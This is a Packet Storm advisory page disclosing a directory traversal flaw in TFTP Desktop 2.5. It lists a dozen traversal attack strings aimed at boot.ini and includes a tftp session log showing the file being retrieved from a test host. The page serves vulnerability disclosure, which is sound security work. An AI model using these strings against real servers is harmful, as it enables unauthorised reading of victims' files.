exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TFTP Desktop 2.5 Directory Traversal

TFTP Desktop 2.5 Directory Traversal
Posted Sep 1, 2010
Authored by chr1x

TFTP Desktop version 2.5 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | 0fba52121f139f361783100a4e7602e6739c3d372cec5c7ce4e052c5324029fe

TFTP Desktop 2.5 Directory Traversal

Change Mirror Download
+------------------------------------------------------------------------+
| ....... |
| ..''xxxxxxxxxxxxxxx'... |
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. |
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. |
| .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. |
| .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. |
| .xxxxxxxxxxxxxxxxxx'... ........ .'. |
| 'xxxxxxxxxxxxxxx'...... '. |
| 'xxxxxxxxxxxxxx'..'x.. .x. |
| .xxxxxxxxxxxx'...'.. ... .' |
| 'xxxxxxxxx'.. . .. .x. |
| xxxxxxx'. .. x. |
| xxxx'. .... x x. |
| 'x'. ...'xxxxxxx'. x .x. |
| .x'. .'xxxxxxxxxxxxxx. '' .' |
| .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' |
| .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. |
| .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' |
| .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. |
| .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. |
| .'xxxxxxx'.... ...xxxxxxx'. |
| ..'xxxxx'.. ..xxxxx'.. |
| ....'xx'.....''''... |
| |
| CubilFelino Security Research Labs |
| proudly presents... |
+------------------------------------------------------------------------+


Author: chr1x (chr1x@sectester.net)
Date: August 30, 2010
Affected operating system/software, including full version details
TFTP Desktop version 2.5, Tested on Windows XP PRO SP3
Download:
http://www.mynet2.com/soft/Software%20Archive/TFTP%20Server/tftp_desktop_free.exe

How the vulnerability can be reproduced

Attack strings below:

[*] Testing Path: .../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\...\...\boot.ini <- Vulnerable string!!

Confirmation log:

root@olovely:/# tftp
tftp> connect
(to) 192.168.1.53
tftp> ascii
tftp> get
(files) .../.../.../.../.../.../boot.ini
Received 211 bytes in 0.0 seconds
tftp> quit

What impact the vulnerability has on the vulnerable system

* High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem.


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close